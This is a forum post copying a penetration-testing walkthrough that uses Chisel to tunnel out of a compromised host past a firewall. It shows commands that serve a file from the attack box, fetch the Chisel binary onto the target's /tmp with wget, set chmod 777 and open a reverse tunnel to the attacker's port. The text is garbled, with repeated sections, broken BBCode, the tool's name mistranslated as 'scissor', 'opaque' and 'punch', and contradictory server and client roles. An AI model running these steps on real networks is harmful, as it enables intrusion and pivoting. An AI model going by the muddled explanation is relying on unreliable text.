Port forwarding background
Port forwarding in computer networks, also known as network address forwarding (NAT) port mapping, redirects communication requests from one combination of addresses and port numbers to another while packets travel through the port. network such as a firewall or router. It is used to prevent unwanted traffic. The network administrator uses one IP address for all external communication over the Internet while dedicating multiple servers with different IPS and ports inside to perform different tasks depending on the requirements of the organization .
Content
Introduction to chisels
Chisel is an open source tool written in the Go language (Golang), mainly useful for bypassing firewalls, although it can also be used to provide a secure endpoint in your network. It's a fast TCP/UDP tunnel, transported over HTTP, and secured over SSH. Also, two things are required to establish a connection between the remote server and the attack box, where the attack box will act as the server and the remote server as the client.
Establish a connection to a remote server
We establish a connection to the remote server using valid credentials. The remote server can be the target and tunneling point for the next leg. If there is another hop that we can connect to, then the remote server will act as a routing point. We logged in as a pentest user to the host using the SSH protocol, which stands for secure socket shell, and transmitted data in encrypted form. After connecting to the remote server, we will display the status of the internal network, which can be obtained with the following commands.
-a all interface
-n show ip address
-t show tcp connections
-p show process id/name
Port forwarding in computer networks, also known as network address forwarding (NAT) port mapping, redirects communication requests from one combination of addresses and port numbers to another while packets travel through the port. network such as a firewall or router. It is used to prevent unwanted traffic. The network administrator uses one IP address for all external communication over the Internet while dedicating multiple servers with different IPS and ports inside to perform different tasks depending on the requirements of the organization .
Content
Kod:
Introduction to chisels
Establish a connection to a remote server
Local port forwarding example - 1
Local port forwarding example - 2
Establishing a connection with a SOCKS5 . proxy
Configure SOCKS5 in the file proxychains4.conf
Capture remote server banners with proxychains
Connect Telnet using proxychains
FTP connection using proxychains
Connect VNC Viewer using proxychains
ConclusionIntroduction to chisels
Chisel is an open source tool written in the Go language (Golang), mainly useful for bypassing firewalls, although it can also be used to provide a secure endpoint in your network. It's a fast TCP/UDP tunnel, transported over HTTP, and secured over SSH. Also, two things are required to establish a connection between the remote server and the attack box, where the attack box will act as the server and the remote server as the client.
Establish a connection to a remote server
We establish a connection to the remote server using valid credentials. The remote server can be the target and tunneling point for the next leg. If there is another hop that we can connect to, then the remote server will act as a routing point. We logged in as a pentest user to the host using the SSH protocol, which stands for secure socket shell, and transmitted data in encrypted form. After connecting to the remote server, we will display the status of the internal network, which can be obtained with the following commands.
-a all interface
-n show ip address
-t show tcp connections
-p show process id/name
Kod:
ssh [email protected]
netstat -antp
Installation
Chisel installation is straightforward in Kali Linux as it comes with a distribution package. We can install it using the below command.
Kod:
apt install chisel
Local port forwarding Example – 1
In reverse port forwarding, it allows connection to remote services hosted in the internal network. Here we are using scissor utility to achieve our goal. This will require you to go through several steps. First, we configure the reverse server in our base machine (Kali) by specifying the port number as 5000.
Once our Chisel server is ready and reverse tunneling enabled, we will need to transfer the Chisel binary to the remote server. Chisel binaries can be downloaded from the official repositories depending on the system architecture. All the latest available binaries can be found by going to the releases tab. Since we will be testing it on a Linux system with AMD64 architecture, we have chosen the marked system.
Download link: Releases · jpillora/chisel
After cloning the archive, it will be saved in the download folder in zip file format. Next, we will extract the file using the gunzip utility. As mentioned earlier, we need to push it to the target system to set up the scissor as a client. For file transfer, we have configured a python server in our local system which will host our files on port 80.
Kod:
gitclone https://github.com/jpillora/chisel.git[/B][/CENTER][/B][/CENTER][/B][/CENTER]
[B][CENTER][B][CENTER][B][CENTER]gunzip chisel_1.7.7_linux_amd64.gz
python3 -m http.server 80We uploaded the opaque binary to the /tmp directory of the remote server, where everyone has full permissions to the files. Then we give the file full permissions so we can run it. Assume we don't give proper permission to deposit. In this case we can't run it as it is only set to read permission when we upload anything to temp folder as low privileged user. To establish a remote connection, we need an opaque server and an opaque client where the opaque server is the attack box and the opaque server will be the target machine. Since we have previously configured the punch server on port 5000, we establish a connection to the server. In this example, we mentioned scissor as a client and provided the IP address and port number of the server (5000). Then we mentioned an access port and localhost with a port where the HTTP service is hosted internally in the remote system.
Kod:
wget 192.168.1.205/ chisel_1.7.7_linux_amd64
chmod 777 chisel_1.7.7_linux_amd64
./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080
A Detailed Guide on Chisel Part 2
A Detailed Guide on Chisel Part 3
Son düzenleme:
